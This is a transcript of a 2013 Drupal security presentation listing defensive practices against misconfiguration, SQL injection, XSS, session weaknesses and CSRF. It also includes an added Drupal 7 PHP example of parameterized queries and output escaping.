
Drupal Security

Presented at Drupal Developers Day 2013

Paul de Paula

October 27, 2013
Transcript

  1. I. Security Misconfiguration: secure your server
     • Avoid using FTP at all costs
     • Who do you share your server with?
     • Keep your OS, PHP, SQL server, etc. up to date
  2. I. Security Misconfiguration
     • Are you using human-readable passwords?
     • Check all "Administer" permissions
     • "Administer filters" can take over a site
     • Use update.module
     • Have you visited or subscribed to the Drupal security page?
     • Avoid any kind of PHP input; write your own modules instead
     • Watch your input formats
  3. I. Injection: Drupal approach
     db_query("UPDATE {mytable} SET value = :value WHERE id = :id", array(':value' => $value, ':id' => $id));
     If you need to include dynamic table or column names in your query, see db_escape_table().
  4. II. Cross Site Scripting
     XSS is very similar to SQL injection. In SQL injection we exploited the vulnerability by injecting SQL queries as user input. In XSS, we inject code (basically client-side scripting) into the remote server.
  5. Persistent Attack
     In a persistent attack, the code injected by the attacker is stored on a secondary storage device (mostly in a database). Ex. session hijacking.
  6. Persistent Attack: Drupal approach
     • check_plain() to escape text to HTML
     • check_markup() to format text to HTML
     • filter_xss() to filter text to HTML
     • filter_xss_admin() to filter admin text to HTML
     • node_view($node) instead of $node->body
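The injection slide (db_query placeholders, db_escape_table) and the persistent-XSS slide (check_plain) fit together in one Drupal 7 module function set. This is an added example, not code from the deck; the table {mytable} with columns id, value and changed, and the mymodule_* function names, are assumptions.

```php
<?php
/**
 * Constructed example (not from the presentation). Assumes a Drupal 7 site
 * with a table {mytable} holding columns id, value and changed.
 */

/**
 * Named placeholders: $value and $id are bound by the database layer and
 * never spliced into the SQL string, so quotes inside $value cannot change
 * the statement. Building the string with "... = '$value'" would.
 */
function mymodule_update_value($id, $value) {
  return db_query('UPDATE {mytable} SET value = :value WHERE id = :id', array(
    ':value' => $value,
    ':id' => $id,
  ));
}

/**
 * Placeholders cannot carry identifiers (table or column names). A
 * caller-supplied sort column is therefore checked against a whitelist and
 * then passed through db_escape_table(), which strips everything outside
 * [A-Za-z0-9_], before it is interpolated into the query text.
 */
function mymodule_list_values($sort_column) {
  $allowed = array('id', 'value', 'changed');
  if (!in_array($sort_column, $allowed, TRUE)) {
    $sort_column = 'id';
  }
  $column = db_escape_table($sort_column);
  return db_query("SELECT id, value FROM {mytable} ORDER BY $column ASC")
    ->fetchAll();
}

/**
 * Output side of the same data. Stored values are user-controlled, so each
 * one goes through check_plain(): a persistent "<script>" payload is shown
 * as literal text instead of being executed in the visitor's browser.
 */
function mymodule_render_values($sort_column) {
  $items = array();
  foreach (mymodule_list_values($sort_column) as $row) {
    $items[] = check_plain($row->value);
  }
  return theme('item_list', array('items' => $items));
}
```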
  7. III. Authentication & Sessions
     • Weak password storage and account management
     • Session hijacking / fixation
     • Lack of session timeout / logout
  8. III. Authentication & Sessions: Drupal approach
     • Passwords are stored encrypted
     • Session IDs changed when permissions change
     • Drupal works with Apache's SSL transport
     • Modules to set certain URLs to use SSL
  9. IV. Cross Site Request Forgery: Drupal approach
     • Form API works with POST submissions by default (makes it harder)
     • Form API includes form tokens, requires form retrieval before submission, and checks for valid values
     • drupal_valid_token() is provided to generate/validate tokens for GET requests
  10. One-way Hash
      • A different randomly generated private key is provided on each site, which can be used to do reversible encryption
      • Up to you to ensure backups are properly protected
  11. Failure to Restrict URL Access
  12. Unvalidated Redirects